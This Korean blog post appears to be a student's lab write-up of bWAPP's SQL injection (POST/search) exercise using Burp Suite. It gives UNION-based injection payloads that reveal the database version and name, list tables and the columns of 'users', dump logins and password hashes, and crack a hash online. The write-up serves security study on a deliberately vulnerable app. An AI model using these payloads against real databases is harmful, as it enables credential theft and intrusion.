MISSON. 버프스위트를 이용해 사용자들의 id와 password를 획득하자.
hello를 입력해주고 버프 스위트를 확인해주었더니 title=hello&action=search라고 적힌 것을 볼 수 있었다.
Quest. 데이터베이스 정보를 알아내세요.
> Hint 1
DB버전을 확인하는 쿼리를 찾아보세요.
> Hint 2
@@vesion, database()으로 버전과 이름을 알 수 있습니다.
시스템 변수 및 함수 | 설명 |
database() | DB 이름 |
user() | 사용자 ID |
system_user() | 권리자 권한 사용자 ID |
version() | DB 서버의 버전 |
@@datadir | DB 서버가 존재하는 경로 |
칼럼 번호에 맞춰 0' union select all 1,@@version,database(),4,5,6,7#를 입력해주면 결과가 다음과 같다.
버전은 5.0.96-0ubuntu3이고 DB의 이름은 bWAPP임을 알 수 있다.
Quest. 데이터베이스에 존재하는 모든 테이블 명을 출력하세요.
> Hint1
GET방식과 쿼리는 같습니다.
4번 줄에 넣어주어야 하므로 4번 자리에 table_name을 넣어주었다.
0' union select all 1,2,3,table_name,5,6,7 from information_schema.tables#
Quest. 사용자 정보가 들어있는 칼럼을 출력하세요.
> Hint1
사용자 정보는 users테이블에 있습니다.
user 테이블을 이용하여
0' union select all 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='users'#
를 입력해주었더니 다음과 같은 결과를 얻을 수 있었다.
Quest. 사용자의 id, password, secret, login 정보를 출력해봅시다.
> Hint1
https://crackstation.net/ 해시값을 크랙할 수 있는 사이트입니다.
> Hint2
password값으로 나온 해시값을 크랙해서 나온 결과를 첨부하면 됩니다.
0' union select all 1,id,login,email,password,6,7 from users# 를 입력해주어서 다음과 같은 결과를 얻을 수 있었다.
해시값을 크랙할 수 있는 사이트에 접속해 위에서 나온 해시값을 입력해주었다.
비밀번호는 bug 이다.
'Web Hacking > WEB Hacking 기초' 카테고리의 다른 글
[SISS] bwAPP 4주차 < Cross-site scripting – Reflected (GET) > (0) | 2022.02.16 |
---|---|
[SISS] 웹 프로젝트 7주차 (0) | 2022.02.13 |
[SISS] bwAPP 3주차 < SQL injection - GET/search > (0) | 2022.02.09 |
[SISS] bwAPP 2주차 < HTML injection - stored(Blog) > (0) | 2022.02.08 |
[SISS] bwAPP 2주차 < HTML injection - Reflected(POST) > (0) | 2022.02.08 |